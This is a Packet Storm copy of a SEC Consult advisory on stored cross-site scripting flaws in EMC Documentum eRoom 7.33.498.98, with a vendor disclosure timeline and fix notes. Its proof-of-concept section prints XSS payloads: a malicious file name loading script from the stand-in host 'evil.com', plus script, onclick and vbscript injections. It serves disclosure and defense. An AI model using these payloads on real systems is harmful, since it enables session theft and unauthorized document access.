what you don't know can hurt you

EMC Documentum eRoom 7.33.498.98 Cross Site Scripting

EMC Documentum eRoom 7.33.498.98 Cross Site Scripting
Posted Mar 16, 2012
Authored by F. Lukavsky, B. Schildendorfer | Site sec-consult.com

EMC Documentum eRoom version 7.33.498.98 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | b289c658d2aa4de7867c38ac84c568b9

EMC Documentum eRoom 7.33.498.98 Cross Site Scripting

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20120315-0 >
title: Multiple permanent cross-site scripting vulnerabilities
product: EMC Documentum eRoom
vulnerable version: 7.33.498.98
fixed version: 7.4.4
impact: high
homepage: http://www.emc.com/products/detail/software2/eroom.htm
found: 2011-05-05
by: F. Lukavsky, B. Schildendorfer
SEC Consult Vulnerability Lab

Vendor description:
"EMC Documentum eRoom is easy-to-use online team collaboration software that
enables distributed teams to work together more efficiently. With Documentum
eRoom, teams around the world can accelerate document collaboration and group
activities, improve the development and delivery of products and services,
optimize collaborative business processes, improve innovation, and streamline


Vulnerability overview/description:
Documentum eRoom suffers from multiple permanent cross-site scripting
vulnerabilities, which allow an attacker to steal other user's sessions,
to impersonate other users and to gain unauthorized access to documents
hosted in eRooms. A JavaScript worm could be utilized to crawl an eRoom and
gather all available documents.

There are many parameters which are not properly sanitized and thus
vulnerable to XSS.

Proof of concept:
1) Permanent Cross-Site Scripting within file names
The extension of files uploaded to Documentum eRoom are not sanitized. The
following file name would lead to execution of script code as soon as the
file is viewed (i.e. in the search results or the directory view)

."><script src="http://evil&#x26;#x2e;com/evil%2ejs"></script>
."><script src="/eRoomReq/Files/facility/eRoom/0_f000/test%2etxt"></script>

2) Permanent Cross-Site Scripting within the personal information
Users can change their personal information. By editing the field
"organization" it is possible to store a malicious JavaScript payload
(e.g., <script>alert(1)</script>).
The payload gets executed every time a user visits a part of the website
responsible for alerting users about changes in the eRoom (i.e., "Choose
Members" for eRooms).

3) Cross-Site Scripting within Links
Via the import function it is possible to add formatted text to database
fields even when the eRoom Plugin is not utilized.
The following formatted text will create links that execute JavaScript code
once clicked:

"<div class=""user""><a
"<div class=""user""><a onclick=""alert(1)"">test</a></div>"

4) Unhandled protocol handlers in links
Although it is not possible to create links with the function "create link"
that execute JavaScript code via the protocol handler "javascript:", the
protocol handler "vbscript" is allowed and would execute VBScript, for example
in IE (e.g., "vbscript:alert(1)", "callto:+1900[premium-rate number]", etc.).

Vulnerable / tested versions:
Documentum eRoom version 7.33.498.98

Vendor contact timeline:
2011-11-22: Contacting vendor through security_alert@emc.com
2011-11-23: Vendor response, issue is being forwarded to the
appropriate product development team for review and
2011-11-28: Vendor response, issue has been reviewed
affected version is not supported anymore
current version not affected by #1 and #3
additional information required for #2 and #4
2011-11-29: Providing additional information for #2 and #4
2011-11-30: Vendor cannot reproduce #2 and #4, asks for additional
2012-01-12: Call with vendor to clarify remaining issues.
2012-01-27: Vendor requests additional information regarding the test
environment in order to reproduce vulnerabilities #2 and #4
2012-03-13: EMC releases patch
2012-03-15: Public release of SEC Consult advisory

According to the vendor, these issues have been fixed in version 7.4.4 of
Documentum eRoom. Upgrade to the new release.

Restrict access to the software as much as possible. Only allow trusted
IP addresses and users in order to minimise attack surface. Do not host
confidential information in Documentum eRoom.

Advisory URL:

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com

EOF F. Lukavsky / @2012


RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2019 Packet Storm. All rights reserved.

Security Services
Hosting By